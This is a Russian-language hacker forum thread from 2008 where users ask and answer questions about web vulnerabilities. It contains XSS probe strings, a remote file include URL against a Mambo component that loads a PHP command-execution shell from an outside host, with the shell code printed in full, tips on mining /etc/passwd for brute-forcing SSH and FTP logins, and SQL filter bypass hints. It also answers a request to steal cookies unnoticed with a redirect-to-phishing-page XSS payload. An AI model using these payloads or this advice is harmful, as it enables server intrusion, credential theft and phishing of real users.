Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. none222

    none222 Guest

    Reputations:
    0
    самео простое - вводи в поля ввода такую штуку: '">xss и смотри где код вышел за пределы ковычки. ДЛя активных ксс - <>><}{)(xss()'=" - смотри в исходнике что фильтруется а что нет
     
  2. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    В разделе php инжекции нашел вот такой инжект -
    Пытаюсь приконектится к серверу по SSH программой putty, login: root .
    В putty логин ввести можно, а пароль даже не видно как вводит. Нажимаю Enter - пишет, что доступ закрыт. Подскажите пожалуйста, в чём проблема?
    И еще, в passwd лежат пароли от пользователей?
     
  3. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Подскажите что делает эта инекция?
    Пытались применить её к vBulletin.
    PHP:
    //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.entgiftungspad.de/cache/cmd7.gif??? 
    Содержимое странички _http://www.entgiftungspad.de/cache/cmd7.gif
    PHP:
    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo 
    $eseguicmd;

    function 
    ex($cfe){
    $res '';
    if (!empty(
    $cfe)){
    if(
    function_exists('exec')){
    @
    exec($cfe,$res);
    $res join("n",$res);
    }
    elseif(
    function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(
    function_exists('system')){
    @
    ob_start();
    @
    system($cfe);
    $res = @ob_get_contents();
    @
    ob_end_clean();
    }
    elseif(
    function_exists('passthru')){
    @
    ob_start();
    @
    passthru($cfe);
    $res = @ob_get_contents();
    @
    ob_end_clean();
    }
    elseif(@
    is_resource($f = @popen($cfe,"r"))){
    $res "";
    while(!@
    feof($f)) { $res .= @fread($f,1024); }
    @
    pclose($f);
    }}
    return 
    $res;
    }
    exit;

     
  4. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Spaise, в /etc/passwd пароли лежали в старых версиях ядер
    Сейчас паролей там нет, а лежат они в /etc/shadow - если у тебя Линукс или Соларис, /etc/master.passwd - Если у тебя *BSD
    Доступны они только руту

    xaker-boss, вообше то это удалённый инклуд в компоненте Мамбо - com_mambowiki, хз как вы пытались его к Булке применить :D
     
    5 people like this.
  5. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Spyder да эт не я пытался, а меня пытались ламанут, просто загленул в свой ЛОГ и у видел там это.
    Спасибо
     
  6. constanta

    constanta New Member

    Joined:
    19 Sep 2007
    Messages:
    33
    Likes Received:
    2
    Reputations:
    0
    Уважаемые господа. Не первый раз сталкиваюсь с такой бедой.
    Запрос такого вида :
    Ошибка такого вида :
    Вопрос: Что это такое. И где можно прочитать какое то описание, как правильно провести иньекцию.

    С удовольствием выслушаю ваши советы.

    P.S. И еще вопрос .
    1. В MSSQL идет фильтрация на TOP и на From . если вместо TOP я могу еще поставить max то фром мне полюбому нужен.
    Что можно сделать в этой ситуации?
     
    #1366 constanta, 24 Mar 2008
    Last edited: 24 Mar 2008
  7. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    constanta ошибка типа sql-inj
    читаем тут http://injection.rulezz.ru/
    попробуй закодировать фром
     
    #1367 ReVOLVeR, 24 Mar 2008
    Last edited: 24 Mar 2008
  8. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят скажите, а что полезного можно извлечь из файла - /etc/passwd ???
     
  9. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    mff логины к ssh которые нередко подходят к фтп
    узнать прова на сервере для определённого юзверя
    используй для бруа к примеру на совпадение логина и пасса
     
    #1369 ReVOLVeR, 24 Mar 2008
    Last edited: 24 Mar 2008
  10. zythar

    zythar Elder - Старейшина

    Joined:
    16 Feb 2008
    Messages:
    517
    Likes Received:
    109
    Reputations:
    5
    оттуда можно узнать имена пользователей которые существуют в системе.
     
    1 person likes this.
  11. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Спасибо вам ReVOLVeR zythar!
     
    1 person likes this.
  12. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    mff благодарность принимается ввиде +++++ к репе)
     
    2 people like this.
  13. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Я такого еще не встречал,может кто подскажет
    при запросе, например:
    выплевывает очень интересную ошибку
    ------------------------------------------------------
    и такое, не первый раз встречаю
    что это может быть?
     
  14. Buffalon

    Buffalon Elder - Старейшина

    Joined:
    22 Mar 2008
    Messages:
    241
    Likes Received:
    34
    Reputations:
    8
    Здрасти.Извините я сильно новичок... .Вот нашол я в чате багу с Xss/
    Как написать мне что бы куки без палева переходили на мыло или на сайт.. .И плиз можете кинуть ссылку на тему типа"Что можно сделать с багой в Xss"
     
  15. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    samarin по первой ссылке это называется те со скулей облом
    по второй те вообще выдало все поля бд E_FATAL_NOSACHOBJ тут тоже не инжэкт а апросто ашибка самой базы
     
    #1375 ReVOLVeR, 24 Mar 2008
    Last edited: 24 Mar 2008
    1 person likes this.
  16. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    Buffalon
    _http://forum.antichat.ru/thread20140.html
     
  17. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    2Buffalon
    попробуй вот так :) сделай фейк этой страницы либо ручками либо через anyfake воткни на хостинг и воткнить в xss такой :
    Code:
    <script type="text/javascript">window.top.location = "http://путь ктвоему фейку";</script>
    
    что собствеено откроет в этом же окне твой фейк !ссылка на почитати выше :)
     
    1 person likes this.
  18. Titop

    Titop New Member

    Joined:
    20 Sep 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    то есть я это написал,он мне пишет что страница не найдена=значит что нет xss

    а если он сьел,то значит я роюсь в исходнике?или это отображается как та на странице?оч хочу разобраться в xss
     
  19. Titop

    Titop New Member

    Joined:
    20 Sep 2007
    Messages:
    16
    Likes Received:
    2
    Reputations:
    1
    здесь я был, но как понял все xss пишутся в исходнике,а что потом та?
     
  20. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    А тут уже начинается самое сложное. Надо немного подумать
     
    _________________________
Thread Status:
Not open for further replies.